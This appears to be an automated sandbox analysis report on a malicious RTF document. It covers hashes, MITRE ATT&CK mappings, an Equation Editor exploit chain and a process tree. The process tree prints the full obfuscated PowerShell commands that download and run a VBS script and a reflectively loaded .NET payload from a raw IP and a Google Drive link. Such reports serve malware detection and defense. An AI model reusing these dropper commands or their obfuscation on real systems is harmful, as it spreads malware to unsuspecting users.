fd9fe0ade0e4a0288bc1274ad9ebd5b080c82e6b221e243cd2810d94368e097b

Analysis

max time kernel
118s
max time network
119s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
28-10-2024 03:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fd9fe0ade0e4a0288bc1274ad9ebd5b080c82e6b221e243cd2810d94368e097b.rtf
Size

126KB
MD5

b9dde198d2ca4cb42b39ed65c78a7432
SHA1

3b9266bf5d632b03d4d68de30dc3c42454b9422d
SHA256

fd9fe0ade0e4a0288bc1274ad9ebd5b080c82e6b221e243cd2810d94368e097b
SHA512

c6b17cf410e949a75115c613d82bc0e999e0d26e892545ab30287e84ddc20bd1091754f4e1c0fa4fe12684398f7472cd16fca376e25c37520981f4b27a202bf2
SSDEEP

768:bRKuqG2R5aSdM4hsSjtvSHg8NRQKb0oAY/oqkuFg9:b02B4nqMvf6RQKxAqH9F4

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
4	1600	EQNEDT32.EXE
6	2852	POWErshell.EXE
8	2564	powershell.exe
10	2564	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
352	powershell.exe
2564	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
2852	POWErshell.EXE
2692	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
7	drive.google.com
8	drive.google.com

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	POWErshell.EXE

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EQNEDT32.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	POWErshell.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Office loads VBA resources, possible macro or embedded object present

Launches Equation Editor 1 TTPs 1 IoCs

Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

exploit

Exploitation for Client Execution

T1203

pid	Process
1600	EQNEDT32.EXE

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2320	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2852	POWErshell.EXE
2692	powershell.exe
2852	POWErshell.EXE
2852	POWErshell.EXE
352	powershell.exe
2564	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2852	POWErshell.EXE
Token: SeDebugPrivilege	2692	powershell.exe
Token: SeDebugPrivilege	352	powershell.exe
Token: SeDebugPrivilege	2564	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2320	WINWORD.EXE
2320	WINWORD.EXE

Suspicious use of WriteProcessMemory 36 IoCs

description	pid	Process	procid_target
PID 1600 wrote to memory of 2408	1600	EQNEDT32.EXE	32
PID 1600 wrote to memory of 2408	1600	EQNEDT32.EXE	32
PID 1600 wrote to memory of 2408	1600	EQNEDT32.EXE	32
PID 1600 wrote to memory of 2408	1600	EQNEDT32.EXE	32
PID 2408 wrote to memory of 2852	2408	mshta.exe	34
PID 2408 wrote to memory of 2852	2408	mshta.exe	34
PID 2408 wrote to memory of 2852	2408	mshta.exe	34
PID 2408 wrote to memory of 2852	2408	mshta.exe	34
PID 2852 wrote to memory of 2692	2852	POWErshell.EXE	37
PID 2852 wrote to memory of 2692	2852	POWErshell.EXE	37
PID 2852 wrote to memory of 2692	2852	POWErshell.EXE	37
PID 2852 wrote to memory of 2692	2852	POWErshell.EXE	37
PID 2852 wrote to memory of 1500	2852	POWErshell.EXE	38
PID 2852 wrote to memory of 1500	2852	POWErshell.EXE	38
PID 2852 wrote to memory of 1500	2852	POWErshell.EXE	38
PID 2852 wrote to memory of 1500	2852	POWErshell.EXE	38
PID 1500 wrote to memory of 2628	1500	csc.exe	39
PID 1500 wrote to memory of 2628	1500	csc.exe	39
PID 1500 wrote to memory of 2628	1500	csc.exe	39
PID 1500 wrote to memory of 2628	1500	csc.exe	39
PID 2852 wrote to memory of 2316	2852	POWErshell.EXE	41
PID 2852 wrote to memory of 2316	2852	POWErshell.EXE	41
PID 2852 wrote to memory of 2316	2852	POWErshell.EXE	41
PID 2852 wrote to memory of 2316	2852	POWErshell.EXE	41
PID 2316 wrote to memory of 352	2316	WScript.exe	42
PID 2316 wrote to memory of 352	2316	WScript.exe	42
PID 2316 wrote to memory of 352	2316	WScript.exe	42
PID 2316 wrote to memory of 352	2316	WScript.exe	42
PID 352 wrote to memory of 2564	352	powershell.exe	44
PID 352 wrote to memory of 2564	352	powershell.exe	44
PID 352 wrote to memory of 2564	352	powershell.exe	44
PID 352 wrote to memory of 2564	352	powershell.exe	44
PID 2320 wrote to memory of 2936	2320	WINWORD.EXE	45
PID 2320 wrote to memory of 2936	2320	WINWORD.EXE	45
PID 2320 wrote to memory of 2936	2320	WINWORD.EXE	45
PID 2320 wrote to memory of 2936	2320	WINWORD.EXE	45

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fd9fe0ade0e4a0288bc1274ad9ebd5b080c82e6b221e243cd2810d94368e097b.rtf"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2320
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:2936

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:1600
- C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\sheisverynicegirlwithgreatworkingskillwithger.hta"
  2⤵
  - System Location Discovery: System Language Discovery
  - Modifies Internet Explorer settings
  - Suspicious use of WriteProcessMemory
  PID:2408
- - C:\Windows\SysWOW64\WindoWsPowerShELL\v1.0\POWErshell.EXE
    "C:\Windows\sYsTeM32\WindoWsPowerShELL\v1.0\POWErshell.EXE" "PowerShelL.EXe -EX Bypass -NOp -w 1 -C dEviCEcREdEnTiaLDEployMENt.EXE ; IEX($(iEx('[SySTEm.tEXT.EncODInG]'+[char]58+[chAr]0x3A+'utF8.GetstrINg([sysTEm.CoNveRt]'+[CHAr]58+[CHaR]0x3A+'FROMBAse64stRInG('+[ChaR]34+'JHk1cSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iRVJkZUZJTklUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxtT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEaU1qVmpTREdFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3dXptLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGRGpYZWVWaSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGt5LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZYlBSanJpKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZbGFsb1AiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc3BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgb2RNQiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR5NXE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjcuNTEvNDMxL2dvb2RwZXJzb253aXRobmljZWhlYXJ0d2hpY2hraXNzeW91Z29vZGxpcHMudElGIiwiJEVOdjpBUFBEQVRBXGdvb2RwZXJzb253aXRobmljZWhlYXJ0d2hpY2hraXNzeW91Z29vLnZiUyIsMCwwKTtzVGFyVC1zbEVFUCgzKTtzdEFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXGdvb2RwZXJzb253aXRobmljZWhlYXJ0d2hpY2hraXNzeW91Z29vLnZiUyI='+[chAr]0x22+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2852
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX Bypass -NOp -w 1 -C dEviCEcREdEnTiaLDEployMENt.EXE
      4⤵
      Evasion via Device Credential Deployment
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2692
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\-epk3xhd.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1500
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDCF8.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCDCF7.tmp"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2628
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\goodpersonwithniceheartwhichkissyougoo.vbS"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2316
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnVXo2aW1hZ2VVcmwgPScrJyBQZ1lodHRwczovJysnL2RyaXZlLmcnKydvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJicrJ2lkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciBQZ1k7VXo2d2ViQ2xpZW50ID0gTicrJ2V3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkMnKydsaWVudDtVejZpbWFnZUJ5dGVzID0gVXo2d2ViQ2xpZW50LkRvd25sb2FkRGF0YShVejZpbWFnZVVybCknKyc7VXo2aW1hZ2VUZXh0ID0nKycgW1N5cycrJ3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoVXo2aW1hZ2VCeXRlcyk7VScrJ3o2c3RhcnRGbGFnID0gUGdZPCcrJzxCQVNFNicrJzRfU1RBUlQ+PlBnWScrJztVJysnejZlbmRGbGFnID0gUGdZPDxCQVNFNjRfRU5EPj5QZ1k7VXo2c3RhcnRJJysnbmRleCA9IFV6NmltYWdlVGV4dC5JbmRleE9mKFV6NnN0YXJ0RmxhZyk7VXo2ZW5kJysnSW5kJysnZXggPSBVejZpbWFnZVRleHQuSW5kZXhPZihVejZlbmRGbGFnKTtVejZzdGEnKydydCcrJ0luZGV4IC1nZSAwIC1hbmQgVXo2ZW5kSW5kZXggLWd0IFV6NnN0YXJ0SW5kZXg7VXo2c3RhcnRJbmRleCArPSBVejZzdGFydEZsYWcuTGVuZ3RoO1V6NmJhc2U2NExlbmd0aCA9IFV6NmVuZCcrJ0luZGV4IC0gVXo2c3RhcnRJbmRleDtVejZiYXNlNjRDb21tYW5kID0gVXo2aW1hZ2VUZXh0LlN1YnN0cmluZyhVejZzdGFydEluZGV4LCBVejZiYXNlNjRMZW5ndGgpO1V6NmJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFV6NmJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAyUmwgRm9yRWFjaC1PYmplY3QgeyBVejZfIH0pWy0xLi4tKFV6NmJhJysnc2U2NEMnKydvbW1hJysnbmQuJysnTGVuZ3RoKV07VXo2Y29tbWFuZEJ5dGVzID0gW1N5c3RlbS4nKydDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhVejZiYXNlNjRSZXZlcnNlZCk7VXonKyc2bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFV6NmNvbW1hbmRCeXRlcycrJyk7VXo2dmFpTWV0aG9kICcrJz0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChQZ1lWQUlQZ1kpO1V6NnZhaU1ldGhvZC5JbnZva2UoVXo2bnUnKydsbCwgQChQZ1knKyd0eHQuVFRWR0ZSLzEzNC8xNS43Ljg2MS40MCcrJzEvLzpwdHRoJysnUGdZLCBQZ1lkZXNhdGl2YWRvUGdZLCBQZ1lkZXNhdGl2YWRvUGdZLCBQZ1lkZXNhdGl2YWRvUGdZLCBQZ1lBZGRJblByb2Nlc3MzMlBnWSwnKycgUGdZJysnZGVzYXRpdmFkb1BnWScrJywgUGdZZGVzYXRpdmFkb1BnWSxQJysnZ1lkZXNhdGl2YWRvUGdZLFBnWWRlc2F0aXZhZG9QZ1ksUGdZZGVzYXRpdmFkb1BnWSxQZ1lkZXNhdGl2YWRvUGdZLCcrJ1BnWWRlc2F0aXZhZG9QZ1ksUGdZMVBnWSxQZ1lkZXNhdGl2YWRvUGdZKScrJyk7JyktckVwTGFjRSAnVXo2JyxbQ2hhUl0zNiAtY1JlcExhQ2UgJ1BnWScsW0NoYVJdMzktY1JlcExhQ2UnMlJsJyxbQ2hhUl0xMjQpIHwgLiggJFZlUmJPc2VQcmVGRXJFTmNFLnRvU3RSSW5nKClbMSwzXSsneCctak9pbicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:352
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('Uz6imageUrl ='+' PgYhttps:/'+'/drive.g'+'oogle.com/uc?export=download&'+'id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur PgY;Uz6webClient = N'+'ew-Object System.Net.WebC'+'lient;Uz6imageBytes = Uz6webClient.DownloadData(Uz6imageUrl)'+';Uz6imageText ='+' [Sys'+'tem.Text.Encoding]::UTF8.GetString(Uz6imageBytes);U'+'z6startFlag = PgY<'+'<BASE6'+'4_START>>PgY'+';U'+'z6endFlag = PgY<<BASE64_END>>PgY;Uz6startI'+'ndex = Uz6imageText.IndexOf(Uz6startFlag);Uz6end'+'Ind'+'ex = Uz6imageText.IndexOf(Uz6endFlag);Uz6sta'+'rt'+'Index -ge 0 -and Uz6endIndex -gt Uz6startIndex;Uz6startIndex += Uz6startFlag.Length;Uz6base64Length = Uz6end'+'Index - Uz6startIndex;Uz6base64Command = Uz6imageText.Substring(Uz6startIndex, Uz6base64Length);Uz6base64Reversed = -join (Uz6base64Command.ToCharArray() 2Rl ForEach-Object { Uz6_ })[-1..-(Uz6ba'+'se64C'+'omma'+'nd.'+'Length)];Uz6commandBytes = [System.'+'Convert]::FromBase64String(Uz6base64Reversed);Uz'+'6loadedAssembly = [System.Reflection.Assembly]::Load(Uz6commandBytes'+');Uz6vaiMethod '+'= [dnlib.IO.Home].GetMethod(PgYVAIPgY);Uz6vaiMethod.Invoke(Uz6nu'+'ll, @(PgY'+'txt.TTVGFR/134/15.7.861.40'+'1//:ptth'+'PgY, PgYdesativadoPgY, PgYdesativadoPgY, PgYdesativadoPgY, PgYAddInProcess32PgY,'+' PgY'+'desativadoPgY'+', PgYdesativadoPgY,P'+'gYdesativadoPgY,PgYdesativadoPgY,PgYdesativadoPgY,PgYdesativadoPgY,'+'PgYdesativadoPgY,PgY1PgY,PgYdesativadoPgY)'+');')-rEpLacE 'Uz6',[ChaR]36 -cRepLaCe 'PgY',[ChaR]39-cRepLaCe'2Rl',[ChaR]124) | .( $VeRbOsePreFErENcE.toStRIng()[1,3]+'x'-jOin'')"
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2564

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Exploitation for Client Execution

T1203

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\-epk3xhd.dll

Filesize
3KB

MD5
694821ec109992a63d0fb5ab4759f3e5

SHA1
95fa510409fc70acbe96dc303ec4e9b9128e1612

SHA256
2eb2e8f9c853bca43f778be4ba1f8c7e75837d750c2ff2e0ee6d810da15199b4

SHA512
34728cb19f4638bb1a6783332abea8262da9624efcb4033b533db14f633216a22f5ecc0ae3b5cde575945ba73b2f8881133094465bff174cf770775c75191dac

Download Submit
C:\Users\Admin\AppData\Local\Temp\-epk3xhd.pdb

Filesize
7KB

MD5
5baf815788f2999cf250fa61c2e037de

SHA1
4cdf247680e0b9b09def1fa8781df15df65658af

SHA256
8e3e89a95f1ce22b89f4f775251a9bc757b355aa0a3bf48f9d89aa0d66c4d6bd

SHA512
efad69140a0c3c10e5126dd1d70c42410209fd0e5298339a5803062cb819eb2168fcbe62df19252102b14608fb1d7c80c3fb1667245f3cf74ce192b20ce5e3ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESDCF8.tmp

Filesize
1KB

MD5
7f018803cd151df4aca5537a6d543288

SHA1
18045e988f58094e7e8d836a33387e5ef49e9ab2

SHA256
928d90703d677137e0d338dd2c19b5114a15c2d8ff7ad7a5ba830627ef89c0dd

SHA512
24f0ae9ca91df2a6cab1d9749e00cbcf865a658a628d28da670b152212bc84b1c64615873ce2f0746db79a41a7c670a9e2f7c530cf4e3fd07c434eb1d71ca6a1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
4ad214aff7e1c0d2b65d12a9a2a7827e

SHA1
4b47efb971db65c9abfcd857a7e1e571a8cc6731

SHA256
5ee0db463ad053d0af04095b8607ea23dbd617fa72e5fd446058792fe3b86833

SHA512
19ebe6cf5ce01aa75ff06e94a7f3aba8a546fb33dfe40a4efd74e33f7da42f3f3049b08a6d5af1e472e2708273ce37c4806867aa7657e55c653d7b3ffb4f00c5

Download Submit
C:\Users\Admin\AppData\Roaming\goodpersonwithniceheartwhichkissyougoo.vbS

Filesize
137KB

MD5
c9a6ade10107f7dd1d69608ac357ba33

SHA1
7a71cb67d442243b88e10add79acee9c7d64df97

SHA256
6cc331a7bcfa86026d435553558a1d1ced841baea6cb3b9b7a0b5eac6227c055

SHA512
9aede0bde73ccbbf68b08f7f673477aa84ed6eeb66ba91e022e92e45e793279eb32262ddbfc4898daa7a0a92c4d312f446e4c495b586b6ab9916acabed9e7d60

Download Submit
C:\Users\Admin\AppData\Roaming\sheisverynicegirlwithgreatworkingskillwithger.hta

Filesize
131KB

MD5
88525e906bbdf8d8c07e66a6fb654a21

SHA1
98cd664d60e4e83e2d51ace6b8e89b4ad2992684

SHA256
5f5a5e0bee42f891a5766a05041909db6981c8e6de0de123cc41196b5089ec59

SHA512
8aeef95955d338c9e78559a40dba58031d09fe7b2048e59f840dcd34f4c23825381b699ef6113975b65b0858d895a8369d6ed7e5d9cd63dfb6a8496799f63730

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\-epk3xhd.0.cs

Filesize
466B

MD5
51aedd46dfa764086bf5f9ad2ddde14b

SHA1
1e07f345bcbb60e7c6ee0dce0f59528d68429ecb

SHA256
855eeda734e7a630d7e8ec0d9e45f2bfa71f2ccd35b2d14595ea4b6a93c9959a

SHA512
f2689db9d4a626afcb10eaabce3ec8da360b244fe5b539e1919754cb5daa6c68d34d1398f67561fd6d924e6002e7682a56f4020f74cb22fe4448960cb4073f22

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\-epk3xhd.cmdline

Filesize
309B

MD5
114fadaf12fbeae40d3ec0668a6ebb54

SHA1
b242ef2bd5b05f4ec4af8b50cca776676eb2b573

SHA256
9080ec8c7113dbd44abe1052ea9312964f08b4eaca331d52500f4ca852c3d8f3

SHA512
4edaf2fe244fd2d80fac101c0f8c342744898fa6734313ffae49c93d710444aa6545367c193236eb1ff43cdc5d4dd2a823a2687b5fa03b7793bd9bdb46290e75

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCDCF7.tmp

Filesize
652B

MD5
3b183f394e338e986707515ae219e2e5

SHA1
ae23badf9c962671d46f53b5a9a860ff687f5895

SHA256
49304d98f3b179f9fd3cb8f1b9472340647f00a7967a7812068104391fb00cb3

SHA512
b55b5f240999daf2388e9474dc797ed9294a408e1507fa022905f8e645c2e30d3e2a6086c6320f048095ea3c3fea8fb7841cb87ded0810811a9905c7b2095623

Download Submit
memory/2320-0-0x000000002F7E1000-0x000000002F7E2000-memory.dmp

Filesize
4KB

Download
memory/2320-2-0x000000007196D000-0x0000000071978000-memory.dmp

Filesize
44KB

Download
memory/2320-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2320-50-0x000000007196D000-0x0000000071978000-memory.dmp

Filesize
44KB

Download